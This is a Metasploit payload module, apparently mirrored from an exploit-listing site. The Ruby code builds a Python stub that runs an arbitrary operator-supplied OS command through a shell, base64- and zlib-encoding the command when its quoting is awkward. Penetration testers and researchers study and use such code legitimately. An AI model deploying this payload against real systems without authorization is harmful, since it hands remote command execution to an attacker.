Share
## https://sploitus.com/exploit?id=MSF:PAYLOAD-PYTHON-EXEC-
module MetasploitModule
  CachedSize = 248

  include Msf::Payload::Single
  include Msf::Payload::Python

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Python Execute Command',
        'Description' => 'Execute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.',
        'Author' => 'Spencer McIntyre',
        'License' => MSF_LICENSE,
        'Platform' => 'python',
        'Arch' => ARCH_PYTHON,
        'PayloadType' => 'python',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
    register_options(
      [
        OptString.new('CMD', [ true, 'The command string to execute' ]),
      ]
    )
  end

  def generate(_opts = {})
    super + command_string
  end

  def command_string
    py_code = %(from subprocess import Popen,PIPE\n)

    # try to just use raw strings if nothing would need to be escaped
    if !datastore['CMD'].include?("'")
      py_code << %(args=[r'#{datastore['CMD']}']\n)
    elsif !datastore['CMD'].include?('"')
      py_code << %(args=[r"#{datastore['CMD']}"]\n)
    elsif !datastore['CMD'].include?("'''")
      py_code << %(args=[r'''#{datastore['CMD']}''']\n)
    elsif !datastore['CMD'].include?('"""')
      py_code << %(args=[r"""#{datastore['CMD']}"""]\n)
    else
      encoded = Rex::Text.encode_base64(Rex::Text.zlib_deflate(datastore['CMD']))
      py_code << %{import zlib,base64;args=[zlib.decompress(base64.b64decode('#{encoded}')).decode()]\n}
    end

    py_code << %{Popen(args,shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)\n}

    py_create_exec_stub(py_code)
  end
end